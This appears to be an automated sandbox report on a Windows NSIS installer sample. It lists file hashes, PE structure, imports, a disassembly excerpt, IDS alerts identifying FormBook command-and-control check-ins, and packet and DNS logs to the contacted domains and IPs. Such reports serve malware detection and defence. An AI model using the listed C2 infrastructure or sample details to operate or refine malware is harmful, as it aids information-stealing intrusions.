Process: C:\Users\user\Desktop\LWlcpDjYIQ.exe
File Type: data
Category: dropped
Size (bytes): 164864
Entropy (8bit): 7.999102061329467
Encrypted: true
SSDEEP: 3072:gbpNGMsacBTLPQ6XNxuq/L8It9Uv3oc78YYWiqf9N8OrOUGuVJLMizNupDn90u:gbjB8BXo6XN9QipQY2zu14iprz
MD5: 1561C77B8880F2D836E670BD0BBE4747
SHA1: 4F608974B29A20293AFDF48EFA952BC2A75BBCE6
SHA-256: 636ECB0968871D043AC47B9D27235810DFD4BE00A4FF3CDAED88E4C7EE93B77E
SHA-512: 80A28FBEE55D66FE74782F44A8224135FAD85C50383D7513C7752FEE9749E5F4FA2422A31D4CE40E7D60C8D53717B9FC4E4819250E53D29F2594734E6D02F78A
Malicious: false
Reputation: low
Preview: 7..4.e.2..<....4V...{.pm._v&.;hlW.m..(...l..:<.`..+..+....!....~.=L|..q...j....Y[n.^..K..O..i._^.y...g..}...xR..O..m..=^.EN.ly..XYtK.4.A.4_..&:..y.*.'*e.\3JD-.oU.......w.....r'.....X.}..Z.k..V?...?...../Bn.....U.VH..< ...&..a..Pt...Pk$.00.N.V{.....)...HRK..hI..Y.mC......b.1....R..q3.B.'./..F1.#..|..B.H.eQ... ..J......Y..-.Ev...B...+H0qN...X.._...C.Z..*.|...Q..>[R.....>`=M.....'.o. T0.. .@..Pj.....V.PD...Lj.(g"..\bnt!...w......P..Y:{ ..\...WUY.....$..8.9A...0.nT.A0.z.....q).3nMvT..B.......D...6.....4...P.r...j@jU.a.".......rD...'.4...K.<L..Zd..a..t.....\...C.....&..H.K.l@.C. ..C_;o.=.>(...$.2C|..U.HN.B..H....8.d.....+W.|KQD^.. .[..F..CRx;.](.{~..l_..e1jx.>X.Ku.w.....^.y.........`.[..We3...{u.z4.b...p.K...;.7[..p...?./U......}s..A .].5......j.m.....`y-i.....'..a...z<..Xk....y..m.....?5...E[.8s.";...BO....!...S}..6^.<.47.......(..s.n].l.S2.Afr........_E.2&=P.9J.cw.=.._.8!..y..D.;.+....U..../B.-($..w Hi.o\.An...@.wY....d9. .........u.....|.x.

Static File Info

General

File type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit): 7.915095365643499
TrID:
• Win32 Executable (generic) a (10002005/4) 92.16%
• NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: LWlcpDjYIQ.exe
File size: 206058
MD5: 91523f8d438585534d9466432cc4665d
SHA1: e34b69f0ded056eca7dd43b8f5be2edf7198c211
SHA256: b5e3426a888ddb5751f9802093f1bd10ec696b2994bee03b99b7ba2b4f21a57d
SHA512: e8035c994acd9e46738b87eae25248df1548f8782d7475b4e9d362b68362ce62962780e46be0e054b9645d1be4e1eea8c93096f8e90bcb179040b5014eeec77b
SSDEEP: 3072:NeYBCwqDxkJ0APVbpNGMsacBTLPQ6XNxuq/L8It9Uv3oc78YYWiqf9N8OrOUGuVf:NDIqbjB8BXo6XN9QipQY2zu14iprCP
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........lJ...$...$...$./.{...$...%.9.$.".y...$.......$.f."...$.Rich..$.........................PE..L.....8E.................\.........

                                                                        File Icon

                                                                        Icon Hash:00828e8e8686b000

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x403166
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                        DLL Characteristics:
                                                                        Time Stamp:0x4538CD1D [Fri Oct 20 13:20:29 2006 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:18bc6fa81e19f21156316b1ae696ed6b

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        sub esp, 0000017Ch
                                                                        push ebx
                                                                        push ebp
                                                                        push esi
                                                                        xor esi, esi
                                                                        push edi
                                                                        mov dword ptr [esp+18h], esi
                                                                        mov ebp, 00409240h
                                                                        mov byte ptr [esp+10h], 00000020h
                                                                        call dword ptr [00407030h]
                                                                        push esi
                                                                        call dword ptr [00407270h]
                                                                        mov dword ptr [0042F4D0h], eax
                                                                        push esi
                                                                        lea eax, dword ptr [esp+30h]
                                                                        push 00000160h
                                                                        push eax
                                                                        push esi
                                                                        push 00429860h
                                                                        call dword ptr [00407158h]
                                                                        push 00409230h
                                                                        push 0042EC20h
                                                                        call 00007F3D4CBC89D8h
                                                                        mov ebx, 00436400h
                                                                        push ebx
                                                                        push 00000400h
                                                                        call dword ptr [004070B4h]
                                                                        call 00007F3D4CBC6119h
                                                                        test eax, eax
                                                                        jne 00007F3D4CBC61D6h
                                                                        push 000003FBh
                                                                        push ebx
                                                                        call dword ptr [004070B0h]
                                                                        push 00409228h
                                                                        push ebx
                                                                        call 00007F3D4CBC89C3h
                                                                        call 00007F3D4CBC60F9h
                                                                        test eax, eax
                                                                        je 00007F3D4CBC62F2h
                                                                        mov edi, 00435000h
                                                                        push edi
                                                                        call dword ptr [00407140h]
                                                                        call dword ptr [004070ACh]
                                                                        push eax
                                                                        push edi
                                                                        call 00007F3D4CBC8981h
                                                                        push 00000000h
                                                                        call dword ptr [00407108h]
                                                                        cmp byte ptr [00435000h], 00000022h
                                                                        mov dword ptr [0042F420h], eax
                                                                        mov eax, edi
                                                                        jne 00007F3D4CBC61BCh
                                                                        mov byte ptr [esp+10h], 00000022h
                                                                        mov eax, 00000001h

                                                                        Rich Headers

                                                                        Programming Language:
                                                                        • [EXP] VC++ 6.0 SP5 build 8804

                                                                        Data Directories

                                                                        Name | Virtual Address | Virtual Size | Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7450 | 0xb4 | .rdata
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x38000 | 0x567 | .rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x280 | .rdata
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                                        Sections

                                                                        Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                        .text | 0x1000 | 0x5bfe | 0x5c00 | False | 0.677097486413 | data | 6.48704517882 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                        .rdata | 0x7000 | 0x11fe | 0x1200 | False | 0.465494791667 | data | 5.27785481266 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .data | 0x9000 | 0x264d4 | 0x400 | False | 0.6669921875 | data | 5.22478733059 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                        .ndata | 0x30000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .rsrc | 0x38000 | 0x567 | 0x600 | False | 0.432942708333 | data | 3.95240646825 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        Name | RVA | Size | Type | Language | Country
                                                                        RT_DIALOG | 0x38100 | 0x100 | data | English | United States
                                                                        RT_DIALOG | 0x38200 | 0x11c | data | English | United States
                                                                        RT_DIALOG | 0x3831c | 0x60 | data | English | United States
                                                                        RT_MANIFEST | 0x3837c | 0x1eb | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

                                                                        Imports

                                                                        DLL | Import
                                                                        KERNEL32.dll | CloseHandle, SetFileTime, CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetFileSize, GetModuleFileNameA, GetTickCount, GetCurrentProcess, lstrcmpiA, ExitProcess, GetCommandLineA, GetWindowsDirectoryA, GetTempPathA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, lstrcmpA, GetEnvironmentVariableA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, SetErrorMode, GetModuleHandleA, LoadLibraryA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, CopyFileA
                                                                        USER32.dll | ScreenToClient, GetWindowRect, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxA, CharPrevA, DispatchMessageA, PeekMessageA, CreateDialogParamA, DestroyWindow, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, TrackPopupMenu, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                                                        GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                                                        SHELL32.dll | SHGetMalloc, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                                                        ADVAPI32.dll | RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                                                        COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                        ole32.dll | OleInitialize, OleUninitialize, CoCreateInstance
                                                                        VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                        Possible Origin

                                                                        Language of compilation system | Country where language is spoken | Map
                                                                        English | United States |

                                                                        Network Behavior

                                                                        Snort IDS Alerts

                                                                        Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                                        04/08/21-13:01:04.899665 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49722 | 80 | 192.168.2.3 | 118.27.122.19
                                                                        04/08/21-13:01:04.899665 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49722 | 80 | 192.168.2.3 | 118.27.122.19
                                                                        04/08/21-13:01:04.899665 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49722 | 80 | 192.168.2.3 | 118.27.122.19
                                                                        04/08/21-13:01:10.374290 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49724 | 34.102.136.180 | 192.168.2.3
                                                                        04/08/21-13:01:26.191338 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49727 | 80 | 192.168.2.3 | 184.168.131.241
                                                                        04/08/21-13:01:26.191338 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49727 | 80 | 192.168.2.3 | 184.168.131.241
                                                                        04/08/21-13:01:26.191338 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49727 | 80 | 192.168.2.3 | 184.168.131.241
                                                                        04/08/21-13:01:32.580771 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49731 | 80 | 192.168.2.3 | 108.186.210.142
                                                                        04/08/21-13:01:32.580771 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49731 | 80 | 192.168.2.3 | 108.186.210.142
                                                                        04/08/21-13:01:32.580771 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49731 | 80 | 192.168.2.3 | 108.186.210.142
                                                                        04/08/21-13:02:09.276811 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49741 | 34.102.136.180 | 192.168.2.3
                                                                        04/08/21-13:02:14.417071 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49743 | 80 | 192.168.2.3 | 5.101.152.161
                                                                        04/08/21-13:02:14.417071 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49743 | 80 | 192.168.2.3 | 5.101.152.161
                                                                        04/08/21-13:02:14.417071 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49743 | 80 | 192.168.2.3 | 5.101.152.161
                                                                        04/08/21-13:02:19.779296 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49744 | 80 | 192.168.2.3 | 208.91.197.27
                                                                        04/08/21-13:02:19.779296 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49744 | 80 | 192.168.2.3 | 208.91.197.27
                                                                        04/08/21-13:02:19.779296 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49744 | 80 | 192.168.2.3 | 208.91.197.27

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                        Apr 8, 2021 13:00:59.204536915 CEST | 49720 | 80 | 192.168.2.3 | 160.153.136.3
                                                                        Apr 8, 2021 13:00:59.239547014 CEST | 80 | 49720 | 160.153.136.3 | 192.168.2.3
                                                                        Apr 8, 2021 13:00:59.240991116 CEST | 49720 | 80 | 192.168.2.3 | 160.153.136.3
                                                                        Apr 8, 2021 13:00:59.241127968 CEST | 49720 | 80 | 192.168.2.3 | 160.153.136.3
                                                                        Apr 8, 2021 13:00:59.275954008 CEST | 80 | 49720 | 160.153.136.3 | 192.168.2.3
                                                                        Apr 8, 2021 13:00:59.276145935 CEST | 49720 | 80 | 192.168.2.3 | 160.153.136.3
                                                                        Apr 8, 2021 13:00:59.276227951 CEST | 49720 | 80 | 192.168.2.3 | 160.153.136.3
                                                                        Apr 8, 2021 13:00:59.310851097 CEST | 80 | 49720 | 160.153.136.3 | 192.168.2.3
                                                                        Apr 8, 2021 13:01:04.661916971 CEST | 49722 | 80 | 192.168.2.3 | 118.27.122.19
                                                                        Apr 8, 2021 13:01:04.899348021 CEST | 80 | 49722 | 118.27.122.19 | 192.168.2.3
                                                                        Apr 8, 2021 13:01:04.899486065 CEST | 49722 | 80 | 192.168.2.3 | 118.27.122.19
                                                                        Apr 8, 2021 13:01:04.899665117 CEST | 49722 | 80 | 192.168.2.3 | 118.27.122.19
                                                                        Apr 8, 2021 13:01:05.137077093 CEST | 80 | 49722 | 118.27.122.19 | 192.168.2.3
                                                                        Apr 8, 2021 13:01:05.137732983 CEST | 80 | 49722 | 118.27.122.19 | 192.168.2.3
                                                                        Apr 8, 2021 13:01:05.137748957 CEST | 80 | 49722 | 118.27.122.19 | 192.168.2.3
                                                                        Apr 8, 2021 13:01:05.137917042 CEST | 49722 | 80 | 192.168.2.3 | 118.27.122.19
                                                                        Apr 8, 2021 13:01:05.137944937 CEST | 49722 | 80 | 192.168.2.3 | 118.27.122.19
                                                                        Apr 8, 2021 13:01:05.375267982 CEST | 80 | 49722 | 118.27.122.19 | 192.168.2.3
                                                                        Apr 8, 2021 13:01:10.183053017 CEST | 49724 | 80 | 192.168.2.3 | 34.102.136.180
                                                                        Apr 8, 2021 13:01:10.195523024 CEST | 80 | 49724 | 34.102.136.180 | 192.168.2.3
                                                                        Apr 8, 2021 13:01:10.195626020 CEST | 49724 | 80 | 192.168.2.3 | 34.102.136.180
                                                                        Apr 8, 2021 13:01:10.195719004 CEST | 49724 | 80 | 192.168.2.3 | 34.102.136.180
                                                                        Apr 8, 2021 13:01:10.207926989 CEST | 80 | 49724 | 34.102.136.180 | 192.168.2.3
                                                                        Apr 8, 2021 13:01:10.374289989 CEST | 80 | 49724 | 34.102.136.180 | 192.168.2.3
                                                                        Apr 8, 2021 13:01:10.374326944 CEST | 80 | 49724 | 34.102.136.180 | 192.168.2.3
                                                                        Apr 8, 2021 13:01:10.374542952 CEST | 49724 | 80 | 192.168.2.3 | 34.102.136.180
                                                                        Apr 8, 2021 13:01:10.374589920 CEST | 49724 | 80 | 192.168.2.3 | 34.102.136.180
                                                                        Apr 8, 2021 13:01:10.388279915 CEST | 80 | 49724 | 34.102.136.180 | 192.168.2.3
                                                                        Apr 8, 2021 13:01:15.434912920 CEST | 49725 | 80 | 192.168.2.3 | 198.185.159.144
                                                                        Apr 8, 2021 13:01:15.577671051 CEST | 80 | 49725 | 198.185.159.144 | 192.168.2.3
                                                                        Apr 8, 2021 13:01:15.579060078 CEST | 49725 | 80 | 192.168.2.3 | 198.185.159.144
                                                                        Apr 8, 2021 13:01:15.579214096 CEST | 49725 | 80 | 192.168.2.3 | 198.185.159.144
                                                                        Apr 8, 2021 13:01:15.721441984 CEST | 80 | 49725 | 198.185.159.144 | 192.168.2.3
                                                                        Apr 8, 2021 13:01:15.762191057 CEST | 80 | 49725 | 198.185.159.144 | 192.168.2.3
                                                                        Apr 8, 2021 13:01:15.762228012 CEST | 80 | 49725 | 198.185.159.144 | 192.168.2.3
                                                                        Apr 8, 2021 13:01:15.762248039 CEST | 80 | 49725 | 198.185.159.144 | 192.168.2.3
                                                                        Apr 8, 2021 13:01:15.762270927 CEST | 80 | 49725 | 198.185.159.144 | 192.168.2.3
                                                                        Apr 8, 2021 13:01:15.762432098 CEST | 49725 | 80 | 192.168.2.3 | 198.185.159.144
                                                                        Apr 8, 2021 13:01:15.762463093 CEST | 49725 | 80 | 192.168.2.3 | 198.185.159.144
                                                                        Apr 8, 2021 13:01:15.762511015 CEST | 49725 | 80 | 192.168.2.3 | 198.185.159.144
                                                                        Apr 8, 2021 13:01:15.762526035 CEST | 80 | 49725 | 198.185.159.144 | 192.168.2.3
                                                                        Apr 8, 2021 13:01:15.762551069 CEST | 80 | 49725 | 198.185.159.144 | 192.168.2.3
                                                                        Apr 8, 2021 13:01:15.762573004 CEST | 80 | 49725 | 198.185.159.144 | 192.168.2.3
                                                                        Apr 8, 2021 13:01:15.762582064 CEST | 49725 | 80 | 192.168.2.3 | 198.185.159.144
                                                                        Apr 8, 2021 13:01:15.762597084 CEST | 80 | 49725 | 198.185.159.144 | 192.168.2.3
                                                                        Apr 8, 2021 13:01:15.762617111 CEST | 80 | 49725 | 198.185.159.144 | 192.168.2.3
                                                                        Apr 8, 2021 13:01:15.762639999 CEST | 49725 | 80 | 192.168.2.3 | 198.185.159.144
                                                                        Apr 8, 2021 13:01:15.762687922 CEST | 49725 | 80 | 192.168.2.3 | 198.185.159.144
                                                                        Apr 8, 2021 13:01:15.762696028 CEST | 49725 | 80 | 192.168.2.3 | 198.185.159.144
                                                                        Apr 8, 2021 13:01:15.904820919 CEST | 80 | 49725 | 198.185.159.144 | 192.168.2.3
                                                                        Apr 8, 2021 13:01:15.904866934 CEST | 80 | 49725 | 198.185.159.144 | 192.168.2.3
                                                                        Apr 8, 2021 13:01:15.904892921 CEST | 80 | 49725 | 198.185.159.144 | 192.168.2.3
                                                                        Apr 8, 2021 13:01:15.904908895 CEST | 49725 | 80 | 192.168.2.3 | 198.185.159.144
                                                                        Apr 8, 2021 13:01:15.904916048 CEST | 80 | 49725 | 198.185.159.144 | 192.168.2.3
                                                                        Apr 8, 2021 13:01:15.904937983 CEST | 80 | 49725 | 198.185.159.144 | 192.168.2.3
                                                                        Apr 8, 2021 13:01:15.904944897 CEST | 49725 | 80 | 192.168.2.3 | 198.185.159.144
                                                                        Apr 8, 2021 13:01:15.904959917 CEST | 80 | 49725 | 198.185.159.144 | 192.168.2.3
                                                                        Apr 8, 2021 13:01:15.904979944 CEST | 49725 | 80 | 192.168.2.3 | 198.185.159.144
                                                                        Apr 8, 2021 13:01:15.904983044 CEST | 80 | 49725 | 198.185.159.144 | 192.168.2.3
                                                                        Apr 8, 2021 13:01:15.905005932 CEST | 49725 | 80 | 192.168.2.3 | 198.185.159.144
                                                                        Apr 8, 2021 13:01:15.905006886 CEST | 80 | 49725 | 198.185.159.144 | 192.168.2.3
                                                                        Apr 8, 2021 13:01:15.905023098 CEST | 80 | 49725 | 198.185.159.144 | 192.168.2.3
                                                                        Apr 8, 2021 13:01:15.905033112 CEST | 49725 | 80 | 192.168.2.3 | 198.185.159.144
                                                                        Apr 8, 2021 13:01:15.905061007 CEST | 49725 | 80 | 192.168.2.3 | 198.185.159.144
                                                                        Apr 8, 2021 13:01:15.906517982 CEST | 49725 | 80 | 192.168.2.3 | 198.185.159.144
                                                                        Apr 8, 2021 13:01:26.013341904 CEST | 49727 | 80 | 192.168.2.3 | 184.168.131.241
                                                                        Apr 8, 2021 13:01:26.190424919 CEST | 80 | 49727 | 184.168.131.241 | 192.168.2.3
                                                                        Apr 8, 2021 13:01:26.190937042 CEST | 49727 | 80 | 192.168.2.3 | 184.168.131.241
                                                                        Apr 8, 2021 13:01:26.191338062 CEST | 49727 | 80 | 192.168.2.3 | 184.168.131.241
                                                                        Apr 8, 2021 13:01:26.368308067 CEST | 80 | 49727 | 184.168.131.241 | 192.168.2.3
                                                                        Apr 8, 2021 13:01:26.698020935 CEST | 80 | 49727 | 184.168.131.241 | 192.168.2.3
                                                                        Apr 8, 2021 13:01:26.698050976 CEST | 80 | 49727 | 184.168.131.241 | 192.168.2.3
                                                                        Apr 8, 2021 13:01:26.698246956 CEST | 49727 | 80 | 192.168.2.3 | 184.168.131.241
                                                                        Apr 8, 2021 13:01:27.183474064 CEST | 49727 | 80 | 192.168.2.3 | 184.168.131.241
                                                                        Apr 8, 2021 13:01:27.360460997 CEST | 80 | 49727 | 184.168.131.241 | 192.168.2.3
                                                                        Apr 8, 2021 13:01:32.423384905 CEST | 49731 | 80 | 192.168.2.3 | 108.186.210.142
                                                                        Apr 8, 2021 13:01:32.580420017 CEST | 80 | 49731 | 108.186.210.142 | 192.168.2.3
                                                                        Apr 8, 2021 13:01:32.580596924 CEST | 49731 | 80 | 192.168.2.3 | 108.186.210.142
                                                                        Apr 8, 2021 13:01:32.580770969 CEST | 49731 | 80 | 192.168.2.3 | 108.186.210.142
                                                                        Apr 8, 2021 13:01:32.737576008 CEST | 80 | 49731 | 108.186.210.142 | 192.168.2.3
                                                                        Apr 8, 2021 13:01:32.746746063 CEST | 80 | 49731 | 108.186.210.142 | 192.168.2.3
                                                                        Apr 8, 2021 13:01:32.746777058 CEST | 80 | 49731 | 108.186.210.142 | 192.168.2.3
                                                                        Apr 8, 2021 13:01:32.746973038 CEST | 49731 | 80 | 192.168.2.3 | 108.186.210.142
                                                                        Apr 8, 2021 13:01:32.747020960 CEST | 49731 | 80 | 192.168.2.3 | 108.186.210.142
                                                                        Apr 8, 2021 13:01:32.906862974 CEST | 80 | 49731 | 108.186.210.142 | 192.168.2.3
                                                                        Apr 8, 2021 13:01:37.916631937 CEST | 49737 | 80 | 192.168.2.3 | 144.76.207.76
                                                                        Apr 8, 2021 13:01:37.939114094 CEST | 80 | 49737 | 144.76.207.76 | 192.168.2.3
                                                                        Apr 8, 2021 13:01:37.939207077 CEST | 49737 | 80 | 192.168.2.3 | 144.76.207.76
                                                                        Apr 8, 2021 13:01:37.939346075 CEST | 49737 | 80 | 192.168.2.3 | 144.76.207.76
                                                                        Apr 8, 2021 13:01:37.961708069 CEST | 80 | 49737 | 144.76.207.76 | 192.168.2.3
                                                                        Apr 8, 2021 13:01:37.961738110 CEST | 80 | 49737 | 144.76.207.76 | 192.168.2.3
                                                                        Apr 8, 2021 13:01:43.103451967 CEST | 49738 | 80 | 192.168.2.3 | 199.59.242.153
                                                                        Apr 8, 2021 13:01:43.214458942 CEST | 80 | 49738 | 199.59.242.153 | 192.168.2.3
                                                                        Apr 8, 2021 13:01:43.214612961 CEST | 49738 | 80 | 192.168.2.3 | 199.59.242.153
                                                                        Apr 8, 2021 13:01:43.214939117 CEST | 49738 | 80 | 192.168.2.3 | 199.59.242.153
                                                                        Apr 8, 2021 13:01:43.325964928 CEST | 80 | 49738 | 199.59.242.153 | 192.168.2.3
                                                                        Apr 8, 2021 13:01:43.326561928 CEST | 80 | 49738 | 199.59.242.153 | 192.168.2.3
                                                                        Apr 8, 2021 13:01:43.326596022 CEST | 80 | 49738 | 199.59.242.153 | 192.168.2.3
                                                                        Apr 8, 2021 13:01:43.326626062 CEST | 80 | 49738 | 199.59.242.153 | 192.168.2.3
                                                                        Apr 8, 2021 13:01:43.326647043 CEST | 80 | 49738 | 199.59.242.153 | 192.168.2.3

                                                                        UDP Packets


DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Apr 8, 2021 13:00:59.163461924 CEST | 192.168.2.3 | 8.8.8.8 | 0xeda7 | Standard query (0) | www.karizcustomizeme.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:01:04.290524006 CEST | 192.168.2.3 | 8.8.8.8 | 0x1c05 | Standard query (0) | www.luxel01.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:01:10.148154020 CEST | 192.168.2.3 | 8.8.8.8 | 0x9af5 | Standard query (0) | www.orchidandiris.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:01:15.401931047 CEST | 192.168.2.3 | 8.8.8.8 | 0x1e15 | Standard query (0) | www.anadelalastra.art | A (IP address) | IN (0x0001)
Apr 8, 2021 13:01:25.979907036 CEST | 192.168.2.3 | 8.8.8.8 | 0xb731 | Standard query (0) | www.ecomcourse.online | A (IP address) | IN (0x0001)
Apr 8, 2021 13:01:32.237593889 CEST | 192.168.2.3 | 8.8.8.8 | 0xb135 | Standard query (0) | www.huongdandidong.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:01:37.762571096 CEST | 192.168.2.3 | 8.8.8.8 | 0xceae | Standard query (0) | www.muzhskoy-eskort.site | A (IP address) | IN (0x0001)
Apr 8, 2021 13:01:42.984450102 CEST | 192.168.2.3 | 8.8.8.8 | 0x72a2 | Standard query (0) | www.simplyhealrhcareplans.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:01:48.364272118 CEST | 192.168.2.3 | 8.8.8.8 | 0x157c | Standard query (0) | www.opusleaf.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:01:53.388469934 CEST | 192.168.2.3 | 8.8.8.8 | 0xefdf | Standard query (0) | www.socialunified.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:01:58.731199026 CEST | 192.168.2.3 | 8.8.8.8 | 0xc268 | Standard query (0) | www.myboardinghome.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:02:03.885523081 CEST | 192.168.2.3 | 8.8.8.8 | 0x4492 | Standard query (0) | www.seymor-law.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:02:09.047559023 CEST | 192.168.2.3 | 8.8.8.8 | 0x8a9f | Standard query (0) | www.lewishackney.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:02:14.294907093 CEST | 192.168.2.3 | 8.8.8.8 | 0xeeac | Standard query (0) | www.shopthen2.site | A (IP address) | IN (0x0001)
Apr 8, 2021 13:02:19.483746052 CEST | 192.168.2.3 | 8.8.8.8 | 0x9bc4 | Standard query (0) | www.kaashir.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Apr 8, 2021 13:00:59.198601007 CEST | 8.8.8.8 | 192.168.2.3 | 0xeda7 | No error (0) | www.karizcustomizeme.com | karizcustomizeme.com | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 13:00:59.198601007 CEST | 8.8.8.8 | 192.168.2.3 | 0xeda7 | No error (0) | karizcustomizeme.com | | 160.153.136.3 | A (IP address) | IN (0x0001)
